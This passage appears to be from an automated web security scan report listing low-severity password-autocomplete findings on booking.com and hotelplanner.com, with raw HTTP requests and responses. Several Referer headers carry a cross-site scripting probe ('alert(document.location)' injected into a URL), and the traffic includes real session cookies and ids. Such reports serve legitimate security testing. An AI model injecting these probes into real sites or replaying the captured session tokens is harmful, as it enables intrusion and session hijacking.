Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAoq1YwiyYkrOHiSAuf28JqI%2BHOflGdlheWSd4aqQ4S9kWAAPfsgw9D66T4wFMCvqGXXx5W9GuJCr25Uqmhj2UpMobDN%2FaI4MouzypAXiHMMHYcyBghPwRPhIR0vlB6Ol8jmLM553G35F%2B2EC9Ct3b6%2FTJ5NqEwZrR9Q%2FH0ukz26yit6QyLTSqcuI2HLQ0VsBUAFVCwlLNxmZuDxyotE%2FwnVYDN1NaPr%2BQ2jMezA%2BQ93xNHE6sHvC2H6NcKqXTt11C7HRYqikso%2BSN%2F4epQIaoqYzVIVHsmZRY8UEQjW5%2FO3Xg3BPtScIum6RN1CcSwBbw2larrInKU6nVmRnGhZFZSu5P%2BH00JmkPzIwtu%2BRR4GgAt2IGq05uSTlyXitF3cA50IfBrXVmzdkzGeF1VQCDl7z%2Bt%2FJ%2FKFnjy9xLhsGvqxJch%2BJrNhkB55c%2FG59roS3buqyAq0TEWAvcdvIs6%2F2UswXdj84aVmCpFWEP7U4%2B3xDuwHi0ZNcE5TtRm2o%2F%2BoVJd9F2TJoqWCE3rBlE2yxL6TdLx9MVgUJv1gc41uBXXGirUBK4SUch8xbCWkl6QTjnYqTCwy8Q%2B%2BmmvhcEChhoBMA6VhIARqLepo8zZ4NgkZsML2nekGw6xRTGM3ca9%2BhMNuoQerjyZvoEu%2FiiH5epR8lpu1HdXNkP0JMNwUWbXzVoEFW92XZe0L8NnZnv34ij1h7BNEk%2BNfqH74wSscgE3wSh0k6ppJE%2Fv9Q8CWuQjBxGKNwr1f2m4Y5TBAI%2BXMckHMBU4%2FG7kpH9XWlaEE4jIt3ALDerskaJo%2BV8L3WCqL8TpX%2BjJlIwJorneFW4eRPNnjpO7sa5YnjqXQwY7kXZWJmN0iVllVt%2FYiNv%2BJq27oaMfjKg7Cz%2BYMz6xSi358Az%2BUCKrCbX68Fejx4UjmRPykDsTcLdD%2BEgyrL1SNvGkFwireGYoqBlUwvX3GYoLcIqONZ4Yuut3w9lOOQNlzXsEUDgQVh%2BI9y7LbESfSW6qGzvYcPpv9xT5TvyQz8z%2FdLDnJJE4D%2BCX2OqQECV32gxKWqLDPgPMvd5a6f3QefT%2BprihDvGDFB%2BprGC%2BccmQL6Yqlr1LqR8bUfmLkF2zwpJUXtO99dcZUw7e6ZxAAvL%2BYr9RrWIU3HuipBrjB%2BVvi9H6DSiBWFxPZk8JvSfmEGq6tDPdi7w2Eyzhum14uflewChdQsVk0SSagrC%2FFdQVu0SyWSHpLf9foVCCVupPIIZ53zHlztSaLpLIAQ7h0rb0XNYPeGEKZaU%2F5jXL2MP2Dnersuv1CqSOtI2VraCP4a6Djbv98BjLgf8UNBaznO6oUgiu4eKAEvOAmLbwIDPAnRTWvBX6d4fP68Dujy0%2FEg9nDhyC4YyPhd8sGLqQCt8iqt3wu7ZlqNcOFUdd6sQlb91qP8GTmymg04fczRJUsyLLBjH4iyApv8l; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 248794
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...

15.4. http://www.booking.com/index.en-us.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<input type="hidden" name="sid" value="9fcdaabed9e2bb46b60772539b0ca101" />

<form id="subscriber_account_active" action="https://secure.booking.com/login.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;">
<input type="hidden" name="op" value="register">
...[SNIP]...
</label>
<input style="float: right;" type="password" name="password" value=""></li>
...[SNIP]...
</label>
<input style="float: right;" type="password" name="password_confirm" value=""></li>
...[SNIP]...

15.5. http://www.booking.com/index.en-us.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...

15.6. http://www.booking.com/searchresults.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDUvX0uhP7z%2Fu1ZYaz9gNQxd55IafrcqsKewAgZpMaj5fZabk6MFuDRuvq58o6S2dFSXEquO8K6cAWdvyRuc9JcewxnlHHL8GOYIx9VvQ59CrwhdaIdStBZrU5q4Ul2guClyvts5IXkU8Ih0ABSFc1yfREbdE8%2B7ma2cdK4o8HDAbGpXup2Rud%2FuWVZbsTNKpP8CfTOZ7OhNndhDIMCH%2FJpeMJWPbLEdaMaSYZn4vDHoQNmtnBn6b8J%2Fb6augQoxf00frRkHVbY68KfYJ505LitOqZ3oZ7z%2FwWy8DZZ0x0aep1Yc6ZO1bfNGToKbQA4b3%2BxXEdyray%2BAxRgnHfTdirXBHrIiwYmgWtjP419X8wonEpceXpCxBzAgvZowpzjITfR8pibhKJiXP8ZIktgM27Ko%2FN0FeapHlFd7qCXe40H6spMYjXkuJghhqyYrHCfhKoxOnIURuiKYju5FyTsAf%2FcGCZQJq5Jz5ROykvLbFlG3FMtN8ezy525Y0V8ACsXyGSJX%2BtAj8qMHr8NQ18df5HpjNT18Hj%2BR%2Bh58NwJwwGSDZjCpXVyLIq62qeabC1McUJgXncEdtL96x7CT%2FvNpdhLhQs7YiMdGaBLTHQTiwULvwyjL3vRFAAGqf8FaoHB%2B87GGYPg8Zzjv%2FAPfoqMyv0OJ%2Bvo1UWD4XBr1wWtIBwidOwITrWQUTf6BVJbKeYZmUvJzYcSSdA3UcFUpr9u1XIBJZ%2F0I4DksHfQhFfmwQ00nikj%2FywtBV%2F84%2BElq4XUsM8Gh%2FcAK5W8NIqtn5QRqry6pE1NgaNCX68XLgU6zltzmw4cLFtMMbOsIx7ofy9ssO6wOlJNxZdhfbLc4O7Zj%2BMWlGTqVrC42NkTgj4512OLZ%2Fc6I67UMvxh3Qie%2FlodheV5sPFXIR5FRrKWi4wsUs48W8gfOBJvpOolIwpdDJdTSxjSuRPL01EuNp7z3Dzy3wlaJZQbE6JrU8PlbJc7tBTRWHZ4mRSdH%2FtGgL9yyifCtziMdOGXNw6kftdRVdI%2FGDbzndHQiN35W7VHyoeMFRi%2Bd0F1FkpavfYxfQdNoqwcdwsAEmwMjyALxN7GqyN1qmLPU4%2BEEBPt5ms%2F7RsoZErADPkOg986sTx5Aq%2B86Q6HID1BJLr7mUjVwW%2FTOkTW4s5494hGd%2FgPB5yo0b0OuCALpHxQxAubkIgrz6yNEReexNwFQBY6hvQFMAFVvhYSMd%2FLdChQJHNAANkDJjdsfannaTHlca6HDzStDUKlpg5Rxu4hGW%2F39QUq9dNAvdq6dQirX43mfviJRlxEdXAXSib9a34ZWTPn%2Bq%2F; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:10:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 388853
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...

15.7. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
